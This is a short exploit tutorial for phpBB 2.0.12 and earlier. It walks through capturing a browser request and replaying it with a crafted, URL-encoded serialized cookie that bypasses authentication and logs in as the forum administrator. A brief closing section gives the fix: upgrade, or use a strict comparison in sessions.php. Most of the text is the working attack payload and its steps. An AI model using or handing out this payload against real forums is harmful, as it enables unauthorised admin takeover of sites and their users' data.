Written by pureone@xxxxxxxxxxx
--------------------------------------------------------------------
--------------------------------------------------------------------
Exploit : 2.0.x >= phpbb 2.0.12 :
--------------------------------------------------------------------
Lets get on with the show shall we?
your need firefox which is found > http://www.mozilla.org/
your also need the HTTP live headers plug in found > http://livehttpheaders.mozdev.org/
ok once installed find your self a phpbb forum i suggest you install one localy
you may need http://www.apachefriends.org/en/xampp.html
& http://prdownloads.sourceforge.net/phpbb/phpBB-2.0.12.zip?download
ok once installed open your browser at http://127.0.0.1 open HTTP live headers which is found in tools.
look for the packet that says
GET /phpbb2/index.php HTTP/1.1
Host : localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: phpbb2support_data=a%3A0%3A%7B%7D
click replay On this line Cookie: phpbb2support_data=a%3A0%3A%7B%7D Replace the a%3A0%3A%7B%7D with a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
then once again click replay. now you should beable to see the admin control panel. and you will be logged in as the admin. exploited! -------------------------------------------------------------------- Solution : ------------------------------------------------------------------- update to phpbb 2.0.13 or what ever version is out at the present time of reading this.
or
open> includes/sessions.php find if( $sessiondata['autologinid'] == $auto_login_key )
replace with if( $sessiondata['autologinid'] === $auto_login_key )
------------------------------------------------------------------------
